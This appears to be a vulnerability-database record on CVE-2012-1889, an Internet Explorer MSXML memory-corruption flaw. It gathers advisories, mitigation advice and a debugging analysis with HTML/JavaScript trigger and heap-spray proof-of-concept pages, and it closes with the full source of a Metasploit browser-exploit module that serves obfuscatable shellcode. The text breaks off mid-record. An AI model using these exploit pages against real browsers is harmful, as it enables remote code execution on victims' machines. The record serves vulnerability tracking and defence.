ID MS12_043 Type canvas Reporter Immunity Canvas Modified 2012-06-13T04:46:00
Description
Name| ms12_043
---|---
CVE| CVE-2012-1889
Exploit Pack| CANVAS
Description| MS12-043 Microsoft Internet Explorer XML Core Services Uninitialized Memory Corruption
Notes| CVE Name: CVE-2012-1889
VENDOR: Microsoft
Notes:
This exploit takes advantage of an uninitialized variable vulnerability as exploited in the wild.
When the get_definition function is called with no value, the CElement assumes the child obj is
initialized, which results in remote code execution.
Tested on:
* Windows XP Professional SP3 English with Internet Explorer 7
* Windows XP Professional SP3 English with Internet Explorer 8
* Windows Vista English with Internet Explorer 7
* Windows Vista English with Internet Explorer 8
* Windows 7 Ultimate English with Internet Explorer 8
* Windows 7 Ultimate English with Internet Explorer 9
Usage (important):
If possible, try to avoid using the js_recon module with this exploit, as loading
third-party software may damage heap offsets.
VersionsAffected: Internet Explorer 6/7/8/9
Repeatability:
MSADV: MS12-043
References: http://technet.microsoft.com/en-us/security/bulletin/ms12-043
CVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1889
Date public: 06/12/2012
CVSS: 9.5
{"cve": [{"lastseen": "2020-10-03T12:06:03", "description": "Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.", "edition": 4, "cvss3": {}, "published": "2012-06-13T04:46:00", "title": "CVE-2012-1889", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1889"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/a:microsoft:xml_core_services:3.0", "cpe:/a:microsoft:xml_core_services:4.0", "cpe:/a:microsoft:xml_core_services:5.0", "cpe:/a:microsoft:xml_core_services:6.0"], "id": "CVE-2012-1889", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1889", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:xml_core_services:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:xml_core_services:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:xml_core_services:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:xml_core_services:3.0:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-13T14:30:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-1889"], "description": "### Description\n\nMicrosoft XML Core Services is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. 
Microsoft XML Core Services versions 3.0, 4.0, 5.0, and 6.0 are affected.\n\n### Technologies Affected\n\n * Avaya CallPilot 4.0 \n * Avaya CallPilot 5.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Conferencing Standard Edition 6.0 \n * Avaya Conferencing Standard Edition 6.0 SP1 \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 5 \n * Avaya Messaging Application Server 5.2 \n * Microsoft XML Core Services 3.0 \n * Microsoft XML Core Services 4.0 \n * Microsoft XML Core Services 5.0 \n * Microsoft XML Core Services 6.0 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nCurrently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: vuldb@securityfocus.com.\n", "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "SMNTC-53934", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53934", "type": "symantec", "title": "Microsoft XML Core Services CVE-2012-1889 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2020-11-15T18:36:37", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nThis is known as a \u201cstate-sponsored \u201d 0-day to attack certain Gmail users. It has been committed as msxml_get_definition_code_exec.rb in the Metasploit Framework. 
However, the current version only targets IE6/7 on Windows XP, because the uninitialized memory is on the heap on those targets. On Win Vista + IE 7 and Win XP + IE8, however, it is on the \nstack.\n\n# Debugging Notes\n\nCrash:\n \n \n 0:008> r\n eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528\n eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\n msxml3!_dispatchImpl::InvokeHelper+0xb4:\n 749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????\n \n 0:008> k\n ChildEBP RetAddr\n 020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4\n 020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e\n 020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa\n 020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50\n 020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa\n 020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d\n 020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8\n 020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a\n 020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98\n 020bf590 633a77ff jscript!VAR::InvokeByName+0x135\n 020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a\n 020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce\n 020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989\n 020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff\n 020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f\n 020bf958 633891f1 jscript!CSession::Execute+0x175\n 020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0\n 020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a\n 020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30\n 020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219\n \n\nThe crash occurs in dispatchImpl::InvokeHelper(), where:\n \n \n .text:749BD751 mov eax, dword ptr [ebp+pvarg.anonymous_0+8] ;pvarg.anonymous_0+8 = pvarg.lVal\n .text:749BD754 cmp eax, ebx ; This checks if eax 
is null, but doesn't check if [eax] is null\n .text:749BD756 mov esi, eax\n .text:749BD758 jz short loc_749BD780\n .text:749BD75A push [ebp+arg_20]\n .text:749BD75D mov ecx, [eax] ; Null pointer dereference, because we didn't check [eax]\n .text:749BD75F push [ebp+arg_1C]\n .text:749BD762 push [ebp+arg_18]\n .text:749BD765 push edi\n .text:749BD766 push 3\n .text:749BD768 push [ebp+arg_C]\n .text:749BD76B push offset _GUID_NULL\n .text:749BD770 push ebx\n .text:749BD771 push eax\n .text:749BD772 call dword ptr [ecx+18h] ; Crash\n \n\nHeap vs Stack:\n\nSome setups allocate the data on the heap, or a simple heap spray will just do the trick. \nBut some setups allocate it on the stack, which is a little trick. We found the following solution \nfrom baidu to put data on the stack:\n \n \n var src = unescape(\"%u1111%u1111\");\n while (src.length < 0x1002) src += src;\n src = \"\\\\\\\\xxx\" + src;\n src = src.substr(0, 0x1000 - 10);\n var pic = document.createElement(\"img\");\n pic.src = src;\n pic.nameProp;\n \n\nSo in the end, this is how we trigger the bug:\n \n \n <object classid=\"clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4\" id=\"#{object_id}\"></object>\n <script>\n var obj = document.getElementById('#{object_id}').object;\n var src = unescape(\"%u0c08%u0c0c\");\n while (src.length < 0x1002) src += src;\n src = \"\\\\\\\\\\\\\\\\xxx\" + src;\n src = src.substr(0, 0x1000 - 10);\n var pic = document.createElement(\"img\");\n pic.src = src;\n pic.nameProp;\n obj.definition(#{rand(999) + 1});\n </script>\n \n\nFinal version of the exploit: \n<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb>\n\n# Analysis\n\nVupen published a nice blog post about advanced exploitation with this bug here:\n\n<http://www.vupen.com/blog/20120717.Advanced_Exploitation_of_Internet_Explorer_XML_CVE-2012-1889_MS12-043.php>\n\nUnfortunately, the presented exploitation techniques can not be used if we can not 
control the \nuninitialized data in the stack:\n \n \n .text:727457A0 lea eax, [ebp+vtDisp]\n .text:727457A3 push eax ; pvarg\n .text:727457A4 call ds:__imp__VariantInit@4 ; VariantInit(x)\n .text:727457AA push ebx\n .text:727457AB lea eax, [ebp+vtDisp]\n .text:727457AE push eax\n .text:727457AF push 2\n .text:727457B1 push ebx\n .text:727457B2 push [ebp+dispid]\n .text:727457B5 push [ebp+pTarget]\n .text:727457B8 call dword ptr [esi+20h] ; DOMNode::_invokeDOMNode\n .text:727457BB cmp eax, ebx\n .text:727457BD jl loc_72740BB6\n \n\nAs VUPEN explained in their blog post, DOMNode::_invokeDOMNode should init the memory location at ebp+vtDisp, \nbut it\u2019s not always true, so controlling ebp+vtDisp allow to reach:\n \n \n .text:727457C3 mov eax, dword ptr [ebp+vtDisp.___u0+8] ; Danger: it isn't ebp+vtDisp, but ebp+vtDisp+8\n .text:727457C6 mov esi, eax\n .text:727457C8 cmp eax, ebx\n .text:727457CA jz short loc_727457F5\n .text:727457CC push [ebp+puArgErr]\n .text:727457CF mov ecx, [eax] ; crash\n .text:727457D1 push [ebp+pExcepInfo]\n .text:727457D4 push [ebp+pVarResult]\n .text:727457D7 push edi\n .text:727457D8 push 3\n .text:727457DA push [ebp+lcid]\n .text:727457DD push offset _GUID_NULL\n .text:727457E2 push ebx\n .text:727457E3 push eax\n .text:727457E4 call dword ptr [ecx+18h]\n .text:727457E7 mov [ebp+hr], eax\n .text:727457EA mov eax, [esi]\n .text:727457EC push esi\n .text:727457ED call dword ptr [eax+8]\n \n\nWhere the memory in the stack can be used to do interesting thing. The problem is how to put interesting objects \nin the stack, since the pic.nameProp; method doesn\u2019t look usefull at all. There is a lack of documentation in the \nVUPEN blog post about how to make it happen, since it assumes you can control the memory in the stack, and just \nexplores the exploitation possibilities.\n\nThere is a clue? in the VUPEN blog:\n\n\u201cThe vulnerable variable can be assigned according to the way xmlDoc.definition is called. 
There are many ways to \nput a particular pointer in the vulnerable variable. We can use for example introspection on an object and call \nxmlDoc.definition on each of its attributes to list the available objects\u201d\n\nHonestly, here is where VUPEN impresses me, because atm I don\u2019t spot how to put a \u201cpartirular pointer in the \nvulnerable variable\u201d. Even when playing with introspection seems to allow some results:\n \n \n <html>\n <body onload=\"f()\">\n \n <div id=\"div\">\n <object id=\"obj\" style=\"display:none\"></object>\n </div>\n \n <pre id=\"results\">\n \n </pre>\n \n <script>\n function f() {\n var test = new ActiveXObject(\"Msxml2.DOMDocument.6.0\");\n var results = document.getElementById(\"results\");\n \n results.innerHTML += \"obj attributes: </br>\";\n \n var count = 0\n for (var v in obj) {\n results.innerHTML += v;\n results.innerHTML += \"<br />\";\n if (count == 0)\n test.definition(v)\n count++;\n }\n alert(count)\n \n var o = obj.cloneNode()\n div.appendChild(o)\n \n results.innerHTML += \"After append, new obj attributes <br />\"\n \n count = 0\n for (var v in obj) {\n results.innerHTML += v;\n results.innerHTML += \"<br />\";\n count++\n }\n alert(count)\n \n }\n </script>\n \n </body>\n </html>\n \n\nMakes the next crash:\n \n \n 0:004> r\n eax=605aa838 ebx=00000000 ecx=5d5b5e5f edx=00000001 esi=605aa838 edi=021fa2a8\n eip=703457e4 esp=021f9f2c ebp=021fa068 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n msxml6!_dispatchImpl::InvokeHelper+0xb3:\n 703457e4 ff5118 call dword ptr [ecx+18h] ds:0023:5d5b5e77=????????\n 0:004> dd eax\n 605aa838 5d5b5e5f 890008c2 ffff5c8d ea38e9ff\n 605aa848 c88bffff 8306e9c1 840f01e1 0015ef37\n 605aa858 5421d233 c9851024 ef32840f 8c8b0015\n 605aa868 00008c24 83fa2b00 048d03e1 fffffcbd\n 605aa878 89c10bff 008c2484 e8c10000 24448902\n 605aa888 247c831c 840f0010 fffff7f0 15ef26e9\n 605aa898 0f178b00 c10852b6 82f704e2 6066392c\n 605aa8a8 00004000 
9ae5850f ef830017 0ff83b04\n 0:004> u eax\n mshtml!CElement::put_innerHTML+0x75:\n 605aa838 5f pop edi\n 605aa839 5e pop esi\n 605aa83a 5b pop ebx\n 605aa83b 5d pop ebp\n 605aa83c c20800 ret 8\n 605aa83f 898d5cffffff mov dword ptr [ebp-0A4h],ecx\n 605aa845 e938eaffff jmp mshtml!CSpliceTreeEngine::RemoveSplice+0x7ec (605a9282)\n 605aa84a 8bc8 mov ecx,eax\n \n\nSecond try, just follow the VUPEN\u2019s instructions:\n \n \n <html>\n <body onload=\"f()\">\n \n <div id=\"div\">\n <object id=\"obj\" style=\"display:none\"></object>\n </div>\n \n <pre id=\"results\">\n \n </pre>\n \n <script>\n function f() {\n var test = new ActiveXObject(\"Msxml2.DOMDocument.6.0\");\n \n var count = 0\n for (var v in obj) {\n if (count == 0)\n test.definition(v)\n count++;\n }\n alert(count)\n \n var o = obj.cloneNode()\n div.appendChild(o)\n \n count = 0\n for (var v in obj) {\n v;\n }\n \n }\n </script>\n \n </body>\n </html>\n \n\nGenerates an ugly crash, which doesn\u2019t look profitable at all :\n \n \n (d14.df0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00000001 ebx=00000000 ecx=703701f2 edx=00000001 esi=00000001 edi=0227a2c8\n eip=703457cf esp=02279f6c ebp=0227a088 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n msxml6!_dispatchImpl::InvokeHelper+0x9e:\n 703457cf 8b08 mov ecx,dword ptr [eax] ds:0023:00000001=????????\n \n\nAnother try, trying to get definition, at the end of instrospection:\n \n \n <html>\n <body onload=\"f()\">\n \n <div id=\"div\">\n <object id=\"obj\" style=\"display:none\"></object>\n </div>\n \n <pre id=\"results\">\n \n </pre>\n \n <script>\n function f() {\n var test = new ActiveXObject(\"Msxml2.DOMDocument.6.0\");\n \n var count = 0\n for (var v in obj) {\n if (count == 175)\n test.definition(v)\n count++;\n }\n alert(count)\n \n var o = obj.cloneNode()\n div.appendChild(o)\n \n 
count = 0\n for (var v in obj) {\n v;\n }\n \n }\n </script>\n \n </body>\n </html>\n \n\nSame crash:\n \n \n 0:005> g\n (1ac.bb0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00000001 ebx=00000000 ecx=703701f2 edx=00000001 esi=00000001 edi=022f9e50\n eip=703457cf esp=022f9af4 ebp=022f9c10 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n msxml6!_dispatchImpl::InvokeHelper+0x9e:\n 703457cf 8b08 mov ecx,dword ptr [eax] ds:0023:00000001=????????\n \n\nMaybe with fuzzing :? time to grinder\u2026\n", "modified": "2020-10-19T00:00:00", "published": "2012-06-13T00:00:00", "id": "AKB:AC628AEF-FD96-4B84-8A20-368E27D16854", "href": "https://attackerkb.com/topics/Y31WYp9Q89/cve-2012-1889---ms12-043-microsoft-xml-core-services-msxml-uninitialized-memory-corruption", "type": "attackerkb", "title": "CVE-2012-1889 - MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "description": "Added: 06/27/2012 \nCVE: [CVE-2012-1889](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889>) \nBID: [53934](<http://www.securityfocus.com/bid/53934>) \nOSVDB: [82873](<http://www.osvdb.org/82873>) \n\n\n### Background\n\n[Microsoft XML Core Services](<http://msdn.microsoft.com/en-us/library/ms763742.aspx>) allows developers to create XML-based applications. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when a user opens a specially crafted web page, which causes MSXML to access an uninitialized object. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>) for fix information and workarounds. 
\n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2719615> \n\n\n### Limitations\n\nExploit works on Windows XP and Windows 7 and requires a user to open the exploit page in Internet Explorer 8 or 9. \n\nJRE 6 must be installed on Windows 7 targets. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:46694E962B00AF2326A1EEB3134C6536", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/msxml_memory_corruption", "type": "saint", "title": "Microsoft XML Core Services memory corruption", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "description": "Added: 06/27/2012 \nCVE: [CVE-2012-1889](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889>) \nBID: [53934](<http://www.securityfocus.com/bid/53934>) \nOSVDB: [82873](<http://www.osvdb.org/82873>) \n\n\n### Background\n\n[Microsoft XML Core Services](<http://msdn.microsoft.com/en-us/library/ms763742.aspx>) allows developers to create XML-based applications. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when a user opens a specially crafted web page, which causes MSXML to access an uninitialized object. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>) for fix information and workarounds. \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2719615> \n\n\n### Limitations\n\nExploit works on Windows XP and Windows 7 and requires a user to open the exploit page in Internet Explorer 8 or 9. \n\nJRE 6 must be installed on Windows 7 targets. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:786C635C0128E667EC292A7093B95663", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/msxml_memory_corruption", "title": "Microsoft XML Core Services memory corruption", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "edition": 2, "description": "Added: 06/27/2012 \nCVE: [CVE-2012-1889](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889>) \nBID: [53934](<http://www.securityfocus.com/bid/53934>) \nOSVDB: [82873](<http://www.osvdb.org/82873>) \n\n\n### Background\n\n[Microsoft XML Core Services](<http://msdn.microsoft.com/en-us/library/ms763742.aspx>) allows developers to create XML-based applications. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when a user opens a specially crafted web page, which causes MSXML to access an uninitialized object. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>) for fix information and workarounds. \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2719615> \n\n\n### Limitations\n\nExploit works on Windows XP and Windows 7 and requires a user to open the exploit page in Internet Explorer 8 or 9. \n\nJRE 6 must be installed on Windows 7 targets. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/msxml_memory_corruption", "id": "SAINT:F68D62A6E6DB5B164C2421615C903854", "type": "saint", "title": "Microsoft XML Core Services memory corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:31", "description": "", "published": "2012-06-16T00:00:00", "type": "packetstorm", "title": "Microsoft XML Core Services MSXML Uninitialized Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2012-06-16T00:00:00", "id": "PACKETSTORM:113765", "href": "https://packetstormsecurity.com/files/113765/Microsoft-XML-Core-Services-MSXML-Uninitialized-Memory-Corruption.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"6.0\", \n:ua_maxver => \"7.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:classid => \"{f6D90f11-9c73-11d3-b32e-00C04f990bb4}\", \n:method => \"definition\", \n:rank => NormalRanking \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft XML Core Services MSXML Uninitialized Memory Corruption\", \n'Description' => %q{ \nThis module exploits a memory corruption flaw in Microsoft XML Core Services \nwhen trying to access an uninitialized Node with the getDefinition API, which \nmay corrupt memory allowing remote code execution. 
At the moment, this module \nonly targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-1889' ], \n[ 'OSVDB', '82873'], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ], \n[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'Space' => 1024 \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\", \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# msxml3.dll 8.90.1101.0 \n[ 'Automatic', {} ], \n[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ], \n[ 'IE 7 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jun 12 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nif agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/ \nreturn targets[1] #IE 6 on Windows XP SP3 \nelsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/ \nreturn targets[2] #IE 7 on Windows XP SP3 \nelse \nreturn nil \nend \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nmy_target = get_target(agent) \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? 
\nprint_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\") \nsend_not_found(cli) \nreturn \nend \n \n# Set payload depending on target \np = payload.encoded \n \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch)) \n \njs = <<-JS \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \n \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \n \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \n \nheap_obj.gc(); \n \nfor (var i=1; i < 0xa70; i++) { \nheap_obj.alloc(block); \n} \n \nJS \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nobject_id = rand_text_alpha(4) \n \nhtml = <<-EOS \n<html> \n<head> \n<script> \n#{js} \n</script> \n</head> \n<body> \n<object classid=\"clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4\" id=\"#{object_id}\"></object><script> \ndocument.getElementById(\"#{object_id}\").object.definition(#{rand(1000)+1}); \n</script> \n</body> \n</html> \nEOS \n \nhtml = html.gsub(/^\\t/, '') \n \nprint_status(\"#{cli.peerhost}:#{cli.peerport} - Sending html\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \n \nend \n \nend \n \n=begin \n \n* Crash on Windows XP SP3 - msxml3.dll 8.90.1101.0 \n \n(e34.358): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. 
\neax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350 \neip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmsxml3!_dispatchImpl::InvokeHelper+0xb4: \n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=???????? \n \n \n0:008> r \neax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528 \neip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmsxml3!_dispatchImpl::InvokeHelper+0xb4: \n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=???????? \n0:008> k \nChildEBP RetAddr \n020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4 \n020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e \n020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa \n020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50 \n020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa \n020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d \n020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8 \n020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a \n020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98 \n020bf590 633a77ff jscript!VAR::InvokeByName+0x135 \n020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a \n020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce \n020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989 \n020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff \n020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f \n020bf958 633891f1 jscript!CSession::Execute+0x175 \n020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0 \n020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a \n020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30 \n020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219 \n \n=end`\n", "cvss": {"score": 9.3, "vector": 